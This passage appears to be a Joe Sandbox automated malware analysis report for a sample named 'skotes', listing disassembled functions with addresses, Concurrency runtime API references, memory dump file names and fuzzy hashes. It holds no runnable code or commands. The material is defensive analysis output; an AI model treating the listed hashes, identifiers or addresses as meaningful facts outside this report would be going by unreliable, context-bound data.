                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: Concurrency::details::$Base::Context$Scheduler$EventInternalItem::ProcessorVirtualWork$ActiveAssignBindCommitConcurrency::location::_GroupPointsReclaimResolveRunnableSafeScheduleSegmentThrowTokenTraceTrigger
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2363638799-0
                                                                                                                                                                                                                                          • Opcode ID: 12688f080c1419357179f3c24e0f9c84fbca6a77635c08f7075a508ec323fbbd
                                                                                                                                                                                                                                          • Instruction ID: cbbbc067f54c73dfce4af065cf73ea0214bef36efc0224777d112cddd652722d
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 12688f080c1419357179f3c24e0f9c84fbca6a77635c08f7075a508ec323fbbd
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: B3518271A002059FDF64EF50C895BEDB777EF44310F154069EA066B392CBB1AE85CB91
                                                                                                                                                                                                                                          Function 006ACB97 Relevance: 1.5, APIs: 1, Instructions: 9nativeCOMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • NtFlushProcessWriteBuffers.NTDLL ref: 006ACBAA
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: BuffersFlushProcessWrite
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID: 2982998374-0
                                                                                                                                                                                                                                          • Opcode ID: 8a77446d4aff7855fe24c0c0b20fa891e27ff79bb16d2916a40982e21092d9ee
                                                                                                                                                                                                                                          • Instruction ID: 6fe212656da5b33f42ef12b3419110b3d56ced3fcbb60b3a57ffad6fd21a7e2e
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 8a77446d4aff7855fe24c0c0b20fa891e27ff79bb16d2916a40982e21092d9ee
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 12B09232A139304BCB512B14BC885AD77569B81A2130B2156DA02AB234CA515E828FE8
                                                                                                                                                                                                                                          Function 006ADD91 Relevance: .1, Instructions: 144COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID:
                                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                                                                          • Opcode ID: 50f3beea9463300879075a12e2704b9e5a12231e10279031c169ff7b1ec0675a
                                                                                                                                                                                                                                          • Instruction ID: 8a84c34701b4249f8db1286551eb94b680ff793ad4edfa92746ab21623fe40ac
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 50f3beea9463300879075a12e2704b9e5a12231e10279031c169ff7b1ec0675a
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 36519CB2A0160A8FDB15DF58D8957AEB7F2FB58304F24856AD406EB790D374AD40CF90
                                                                                                                                                                                                                                          Function 006AF028 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 229COMMONLIBRARYCODE
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • std::invalid_argument::invalid_argument.LIBCONCRT ref: 006AF2BB
                                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278929467.00000000008B7000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279039474.00000000008C3000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279168151.00000000008CD000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279334863.00000000008E9000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279407574.00000000008F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279518624.00000000008FF000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279661164.0000000000902000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279854603.0000000000903000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7279993030.0000000000905000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280108048.000000000090E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280247867.000000000090F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280355990.0000000000910000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280427090.0000000000913000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280599351.000000000091A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280847963.000000000091F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7280967937.0000000000920000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281087872.0000000000922000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281231155.0000000000923000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281368048.000000000092B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281535264.0000000000942000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281656926.0000000000944000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281741289.000000000094D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000094E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7281849160.000000000096B000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282158490.0000000000999000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282279815.000000000099A000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282398679.000000000099F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282502972.00000000009A1000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282600354.00000000009AE000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7282654461.00000000009B0000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                          • Snapshot File: hcaresult_3_2_690000_skotes.jbxd
                                                                                                                                                                                                                                          Yara matches
                                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                                          • API ID: std::invalid_argument::invalid_argument
                                                                                                                                                                                                                                          • String ID: pEvents
                                                                                                                                                                                                                                          • API String ID: 2141394445-2498624650
                                                                                                                                                                                                                                          • Opcode ID: 093f23068ac175d760aab8dd7b7f38010bd29353b2e3ddc016f90ff394ecca27
                                                                                                                                                                                                                                          • Instruction ID: b3b5dd017e921a05234ef27dd6aceedf1d3efb41b7bbc60a9300fdad882dabdf
                                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 093f23068ac175d760aab8dd7b7f38010bd29353b2e3ddc016f90ff394ecca27
                                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1F816B31D002199BCF24EBE8C981BEEB7B6AF56310F144469E401A7382DB75AE45CF92
                                                                                                                                                                                                                                          Function 006C26D1 Relevance: 22.7, APIs: 15, Instructions: 231COMMON
                                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::PreSearch.LIBCONCRT ref: 006C26E3
                                                                                                                                                                                                                                            • Part of subcall function 006C24E1: Concurrency::details::WorkItem::WorkItem.LIBCMT ref: 006C2504
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::PeriodicScan.LIBCONCRT ref: 006C2704
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::CheckPriorityList.LIBCONCRT ref: 006C2711
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::GetNextPriorityObject.LIBCMT ref: 006C275F
                                                                                                                                                                                                                                          • Concurrency::details::SchedulerBase::AcquireQuickCacheSlot.LIBCMT ref: 006C27E6
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::QuickSearch.LIBCMT ref: 006C27F9
                                                                                                                                                                                                                                          • Concurrency::details::WorkSearchContext::SearchCacheLocal_Runnables.LIBCONCRT ref: 006C2846
                                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                                          • Source File: 00000003.00000002.7275648216.0000000000691000.00000040.00000001.01000000.00000007.sdmp, Offset: 00690000, based on PE: true
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275433344.0000000000690000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275648216.00000000006F2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7275968302.00000000006F9000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276147985.00000000006FB000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276304811.0000000000707000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7276928573.0000000000861000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277058209.0000000000863000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277328542.000000000087C000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277424160.000000000087E000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.000000000087F000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277572625.0000000000889000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277864045.000000000088D000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7277942912.000000000088E000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278102362.0000000000891000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278214114.0000000000892000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278285092.000000000089B000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278377632.00000000008A2000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278550742.00000000008B4000.00000080.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278710256.00000000008B5000.00000040.00000001.01000000.00000007.sdmpDownload File
                                                                                                                                                                                                                                          • Associated: 00000003.00000002.7278829889.00000000008B6000.00000080.00000001.01000000.00000007.sdmpDownload File
